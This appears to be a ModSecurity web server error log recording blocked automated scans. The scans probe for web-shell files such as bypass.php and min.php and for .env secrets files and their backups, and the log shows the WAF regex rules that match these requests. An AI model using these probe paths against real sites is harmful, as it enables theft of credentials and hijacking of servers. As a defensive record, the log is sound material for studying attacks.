[Tue May 26 13:11:57.071891 2026] [security2:error] [pid 496740:tid 496966] [client 20.151.117.104:44972] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/makeasmtp.php"] [unique_id "ahVOxevOeft4ltnLrH40UgAAAGA"]
[Tue May 26 13:11:57.179673 2026] [security2:error] [pid 496740:tid 496929] [client 207.241.173.215:11436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env"] [unique_id "ahVOxevOeft4ltnLrH40WgAAADs"]
[Tue May 26 13:11:57.179909 2026] [security2:error] [pid 496740:tid 496978] [client 207.241.173.215:11408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/api/.env"] [unique_id "ahVOxevOeft4ltnLrH40XQAAAGw"]
[Tue May 26 13:11:57.191002 2026] [security2:error] [pid 496740:tid 496897] [client 207.241.173.215:11494] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/backend/.env"] [unique_id "ahVOxevOeft4ltnLrH40YwAAABs"]
[Tue May 26 13:11:57.191016 2026] [security2:error] [pid 496740:tid 496932] [client 207.241.173.215:11478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/app/.env"] [unique_id "ahVOxevOeft4ltnLrH40YgAAAD4"]
[Tue May 26 13:11:57.216345 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:35563] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/paku.php"] [unique_id "ahVOxevOeft4ltnLrH40agAAADc"]
[Tue May 26 13:11:57.216434 2026] [security2:error] [pid 496740:tid 496925] [client 20.151.117.104:35563] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/paku.php"] [unique_id "ahVOxevOeft4ltnLrH40agAAADc"]
[Tue May 26 13:11:57.358448 2026] [security2:error] [pid 496740:tid 496965] [client 20.151.117.104:59287] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/rtx.php"] [unique_id "ahVOxevOeft4ltnLrH40ggAAAF8"]
[Tue May 26 13:11:57.358551 2026] [security2:error] [pid 496740:tid 496965] [client 20.151.117.104:59287] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/rtx.php"] [unique_id "ahVOxevOeft4ltnLrH40ggAAAF8"]
[Tue May 26 13:11:57.501106 2026] [security2:error] [pid 496740:tid 496969] [client 20.151.117.104:35564] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/update/da222.php"] [unique_id "ahVOxevOeft4ltnLrH40iQAAAGM"]
[Tue May 26 13:11:57.501236 2026] [security2:error] [pid 496740:tid 496969] [client 20.151.117.104:35564] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/update/da222.php"] [unique_id "ahVOxevOeft4ltnLrH40iQAAAGM"]
[Tue May 26 13:11:57.653900 2026] [security2:error] [pid 496740:tid 496948] [client 20.151.117.104:6668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOxevOeft4ltnLrH40kwAAAE4"]
[Tue May 26 13:11:57.727525 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:6668] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/min.php"] [unique_id "ahVOxevOeft4ltnLrH40lwAAAEU"]
[Tue May 26 13:11:57.727685 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:6668] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/min.php"] [unique_id "ahVOxevOeft4ltnLrH40lwAAAEU"]
[Tue May 26 13:11:57.870041 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:27652] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp-fileesx-449.php"] [unique_id "ahVOxevOeft4ltnLrH40ngAAADE"]
[Tue May 26 13:11:57.870158 2026] [security2:error] [pid 496740:tid 496919] [client 20.151.117.104:27652] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp-fileesx-449.php"] [unique_id "ahVOxevOeft4ltnLrH40ngAAADE"]
[Tue May 26 13:11:58.013095 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:16128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/min.php"] [unique_id "ahVOxuvOeft4ltnLrH40owAAAA4"]
[Tue May 26 13:11:58.013275 2026] [security2:error] [pid 496740:tid 496884] [client 20.151.117.104:16128] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/min.php"] [unique_id "ahVOxuvOeft4ltnLrH40owAAAA4"]
[Tue May 26 13:11:58.065720 2026] [security2:error] [pid 496740:tid 496886] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVOxevOeft4ltnLrH40jwAAABA"]
[Tue May 26 13:11:58.158200 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:49863] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/x/bypass.php"] [unique_id "ahVOxuvOeft4ltnLrH40rQAAAFg"]
[Tue May 26 13:11:58.158345 2026] [security2:error] [pid 496740:tid 496958] [client 20.151.117.104:49863] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-content/themes/x/bypass.php"] [unique_id "ahVOxuvOeft4ltnLrH40rQAAAFg"]
[Tue May 26 13:11:58.300969 2026] [security2:error] [pid 496740:tid 496990] [client 20.151.117.104:42110] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/interactivity-api/index.php"] [unique_id "ahVOxuvOeft4ltnLrH40ugAAAHg"]
[Tue May 26 13:11:58.301096 2026] [security2:error] [pid 496740:tid 496990] [client 20.151.117.104:42110] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-includes/interactivity-api/index.php"] [unique_id "ahVOxuvOeft4ltnLrH40ugAAAHg"]
[Tue May 26 13:11:58.445253 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:35532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-info.php"] [unique_id "ahVOxuvOeft4ltnLrH40wgAAAEU"]
[Tue May 26 13:11:58.445359 2026] [security2:error] [pid 496740:tid 496939] [client 20.151.117.104:35532] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-info.php"] [unique_id "ahVOxuvOeft4ltnLrH40wgAAAEU"]
[Tue May 26 13:11:58.588367 2026] [security2:error] [pid 496740:tid 496942] [client 20.151.117.104:54404] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-wordfence-waf.php"] [unique_id "ahVOxuvOeft4ltnLrH40ygAAAEg"]
[Tue May 26 13:11:58.588473 2026] [security2:error] [pid 496740:tid 496942] [client 20.151.117.104:54404] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-wordfence-waf.php"] [unique_id "ahVOxuvOeft4ltnLrH40ygAAAEg"]
[Tue May 26 13:11:58.730848 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:27904] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/ws49.php"] [unique_id "ahVOxuvOeft4ltnLrH400QAAAG8"]
[Tue May 26 13:11:58.730976 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:27904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/ws49.php"] [unique_id "ahVOxuvOeft4ltnLrH400QAAAG8"]
[Tue May 26 13:11:58.746072 2026] [security2:error] [pid 496740:tid 496872] [client 207.241.173.215:11436] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.copy"] [unique_id "ahVOxuvOeft4ltnLrH400gAAAAI"]
[Tue May 26 13:11:58.761688 2026] [security2:error] [pid 496740:tid 496890] [client 104.23.217.13:10701] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "paqys.com"] [uri "/index.php"] [unique_id "ahVOxuvOeft4ltnLrH40pAAAABQ"]
[Tue May 26 13:11:58.804024 2026] [security2:error] [pid 496740:tid 496844] [remote 185.177.72.30:64738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/.phpunit.result.cache"] [unique_id "ahVOxuvOeft4ltnLrH400wAAG2c"]
[Tue May 26 13:11:58.873592 2026] [security2:error] [pid 496740:tid 496944] [client 20.151.117.104:40688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/xxx.php"] [unique_id "ahVOxuvOeft4ltnLrH402gAAAEo"]
[Tue May 26 13:11:58.873718 2026] [security2:error] [pid 496740:tid 496944] [client 20.151.117.104:40688] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/xxx.php"] [unique_id "ahVOxuvOeft4ltnLrH402gAAAEo"]
[Tue May 26 13:11:59.016688 2026] [security2:error] [pid 496740:tid 496984] [client 20.151.117.104:30852] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/CDX1.php"] [unique_id "ahVOx-vOeft4ltnLrH405AAAAHI"]
[Tue May 26 13:11:59.016797 2026] [security2:error] [pid 496740:tid 496984] [client 20.151.117.104:30852] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/CDX1.php"] [unique_id "ahVOx-vOeft4ltnLrH405AAAAHI"]
[Tue May 26 13:11:59.121441 2026] [fcgid:warn] [pid 496740:tid 496954] (70014)End of file found: [client 199.45.154.142:36360] mod_fcgid: can't get data from http client
[Tue May 26 13:11:59.165680 2026] [security2:error] [pid 496740:tid 496889] [client 20.151.117.104:14272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/akcc.php"] [unique_id "ahVOx-vOeft4ltnLrH405wAAABM"]
[Tue May 26 13:11:59.165776 2026] [security2:error] [pid 496740:tid 496889] [client 20.151.117.104:14272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/akcc.php"] [unique_id "ahVOx-vOeft4ltnLrH405wAAABM"]
[Tue May 26 13:11:59.309698 2026] [security2:error] [pid 496740:tid 496927] [client 20.151.117.104:6690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/control.php"] [unique_id "ahVOx-vOeft4ltnLrH408QAAADk"]
[Tue May 26 13:11:59.309819 2026] [security2:error] [pid 496740:tid 496927] [client 20.151.117.104:6690] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/control.php"] [unique_id "ahVOx-vOeft4ltnLrH408QAAADk"]
[Tue May 26 13:11:59.458383 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:27929] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/modules/mod_footer/tmpl/index.php"] [unique_id "ahVOx-vOeft4ltnLrH40-wAAAEE"]
[Tue May 26 13:11:59.458502 2026] [security2:error] [pid 496740:tid 496935] [client 20.151.117.104:27929] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/modules/mod_footer/tmpl/index.php"] [unique_id "ahVOx-vOeft4ltnLrH40-wAAAEE"]
[Tue May 26 13:11:59.476050 2026] [security2:error] [pid 496740:tid 496907] [client 207.241.173.215:11524] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.bak"] [unique_id "ahVOx-vOeft4ltnLrH40_wAAACU"]
[Tue May 26 13:11:59.601201 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:28882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/s.php"] [unique_id "ahVOx-vOeft4ltnLrH41AgAAAG8"]
[Tue May 26 13:11:59.601322 2026] [security2:error] [pid 496740:tid 496981] [client 20.151.117.104:28882] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/s.php"] [unique_id "ahVOx-vOeft4ltnLrH41AgAAAG8"]
[Tue May 26 13:11:59.620896 2026] [security2:error] [pid 496740:tid 496972] [client 64.233.173.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVOxuvOeft4ltnLrH40vgAAZlc"]
[Tue May 26 13:11:59.749645 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:14272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/sagax.php"] [unique_id "ahVOx-vOeft4ltnLrH41CAAAAGg"]
[Tue May 26 13:11:59.749777 2026] [security2:error] [pid 496740:tid 496974] [client 20.151.117.104:14272] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/sagax.php"] [unique_id "ahVOx-vOeft4ltnLrH41CAAAAGg"]
[Tue May 26 13:11:59.901676 2026] [security2:error] [pid 496740:tid 496917] [client 20.151.117.104:49102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "grandconclaveindia.org.in"] [uri "/cgi-sys/404.html"] [unique_id "ahVOx-vOeft4ltnLrH41GAAAAC8"]
[Tue May 26 13:11:59.974312 2026] [security2:error] [pid 496740:tid 496982] [client 207.241.173.215:11730] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env~"] [unique_id "ahVOx-vOeft4ltnLrH41GQAAAHA"]
[Tue May 26 13:11:59.975241 2026] [security2:error] [pid 496740:tid 496989] [client 207.241.173.215:11898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production~"] [unique_id "ahVOx-vOeft4ltnLrH41GgAAAHc"]
[Tue May 26 13:11:59.975740 2026] [security2:error] [pid 496740:tid 496932] [client 20.151.117.104:49102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 104.117.151.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp-teest.php"] [unique_id "ahVOx-vOeft4ltnLrH41IAAAAD4"]
[Tue May 26 13:11:59.975845 2026] [security2:error] [pid 496740:tid 496932] [client 20.151.117.104:49102] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "grandconclaveindia.org.in"] [uri "/wp-admin/wp-teest.php"] [unique_id "ahVOx-vOeft4ltnLrH41IAAAAD4"]
[Tue May 26 13:11:59.976436 2026] [security2:error] [pid 496740:tid 496962] [client 207.241.173.215:11914] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.swp"] [unique_id "ahVOx-vOeft4ltnLrH41HAAAAFw"]
[Tue May 26 13:11:59.976881 2026] [security2:error] [pid 496740:tid 496980] [client 207.241.173.215:11858] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.bak"] [unique_id "ahVOx-vOeft4ltnLrH41HQAAAG4"]
[Tue May 26 13:11:59.976952 2026] [security2:error] [pid 496740:tid 496880] [client 207.241.173.215:11920] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.production.orig"] [unique_id "ahVOx-vOeft4ltnLrH41HgAAAAo"]
[Tue May 26 13:11:59.977085 2026] [security2:error] [pid 496740:tid 496966] [client 207.241.173.215:11812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.bak"] [unique_id "ahVOx-vOeft4ltnLrH41IQAAAGA"]
[Tue May 26 13:11:59.977790 2026] [security2:error] [pid 496740:tid 496937] [client 207.241.173.215:11856] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "singhcouriercargo.com"] [uri "/.env.local.copy"] [unique_id "ahVOx-vOeft4ltnLrH41GwAAAEM"]
